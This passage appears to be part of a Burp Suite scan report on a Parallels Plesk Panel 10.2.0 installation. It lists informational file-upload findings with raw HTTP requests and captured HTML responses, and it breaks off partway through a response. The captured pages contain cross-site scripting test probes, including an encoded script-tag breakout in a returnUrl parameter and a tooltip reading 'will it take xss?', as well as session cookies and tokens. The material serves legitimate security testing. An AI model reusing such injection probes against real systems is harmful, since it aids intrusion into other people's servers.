Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9. File upload functionality
There are 5 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


9.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@2/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/custom-buttons/custom-button@2/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:21:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:21:01 GMT
Connection: close
Content-Length: 17825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@2/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="inject" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="fdf080d92960a97399f5295d" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="2">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@3/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/custom-buttons/custom-button@3/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:20:50 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:20:51 GMT
Connection: close
Content-Length: 17813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
